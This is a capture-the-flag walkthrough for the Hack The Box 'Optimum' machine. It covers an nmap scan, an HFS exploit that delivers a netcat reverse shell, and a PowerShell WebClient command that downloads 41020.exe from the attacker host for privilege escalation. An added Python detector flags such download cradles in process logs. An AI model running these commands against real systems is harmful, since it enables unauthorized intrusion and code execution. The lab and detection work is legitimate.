Again, we start with nmap -sC -sV -oA ./optimum -Pn 10.10.10.8
Web only, so far. While I dig into the web portal, I'm going to rescan, but with all ports. The Web Portal seems to be an HTTP File Server (HFS). There's a Metasploit module, but again, Metasploit makes us lazy. Instead, consult the great Google-Fu Master.
Checking out the one from Exploit DB, we can copy the exploit code into our own .py file and then change the IP address to ours. Then we need to start an http.server module on port 80 (sudo python -m http.server 80). Copy the nc.exe binary from /usr/share/windows-resources/binaries/nc.exe to whichever folder you have the http.server running in. Then start a netcat listener on port 443, and run the exploit with:
python ./ex.py 10.10.10.8 80
And with that bit of lovely, we have a shell as Kostas and the User flag. Run systeminfo and then copy and paste the output into a text file on your attacking machine. You're going to need it in a moment.
Run the system info txt file through the Windows Exploit Suggester and you'll see this box is vulnerable to damn near everything. The one that matters though is:
So, we can grab the exploit here. Now, to get it over to the target box and execute it. We can do that with:
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.10/41020.exe', 'c:\Users\Public\Downloads\41020.exe')"
and then just run it from the target. Grab your root flag and get your party on.
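Seen from the defending side, the PowerShell download step above leaves a very recognizable command line in process-creation logs. The following is an added example, not part of the original writeup: it flags WebClient download cradles and notes why each hit looks suspicious. The log source (Windows Security Event ID 4688 or Sysmon Event ID 1 command lines), the function names and the second and third sample lines are assumptions made for the illustration.

```python
import re
from urllib.parse import urlparse

# New-Object [System.]Net.WebClient followed by .DownloadFile/.DownloadString/.DownloadData
CRADLE = re.compile(
    r"new-object\s+(?:system\.)?net\.webclient\s*\)?\s*\.\s*"
    r"(?:downloadfile|downloadstring|downloaddata)\s*\(\s*"
    r"['\"](?P<url>[^'\"]+)['\"]"
    r"(?:\s*,\s*['\"](?P<path>[^'\"]+)['\"])?",
    re.IGNORECASE,
)
# Directories any low-privileged user can normally write to.
WRITABLE = ("\\users\\public\\", "\\appdata\\", "\\temp\\", "\\programdata\\")
EXEC_EXT = (".exe", ".dll", ".ps1", ".bat", ".scr")
RAW_IP = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

def inspect_cmdline(cmdline):
    """Return a finding dict if the command line holds a download cradle, else None."""
    m = CRADLE.search(cmdline)
    if not m:
        return None
    url, path = m.group("url"), (m.group("path") or "")
    reasons = ["webclient-download"]
    if RAW_IP.match(urlparse(url).hostname or ""):
        reasons.append("raw-ip-host")          # no DNS name, typical of ad-hoc staging
    if path.lower().endswith(EXEC_EXT):
        reasons.append("executable-written")
    if any(d in path.lower() for d in WRITABLE):
        reasons.append("user-writable-dir")
    return {"url": url, "path": path, "reasons": reasons}

def triage(lines):
    """Keep only the command lines that produced a finding."""
    return [f for f in map(inspect_cmdline, lines) if f]

# Sample command lines: the first is the one from this writeup, the others are constructed.
SAMPLES = [
    r'''powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.10/41020.exe', 'c:\Users\Public\Downloads\41020.exe')"''',
    r'powershell -c "Get-ChildItem C:\inetpub"',
    r'''powershell -c "(New-Object Net.WebClient).DownloadFile('https://updates.example.com/readme.txt', 'D:\docs\readme.txt')"''',
]

if __name__ == "__main__":
    for finding in triage(SAMPLES):
        print(len(finding["reasons"]), finding["path"], finding["reasons"])
```

The more reasons a hit carries, the higher it should sit in the triage queue; the command from this box trips all four.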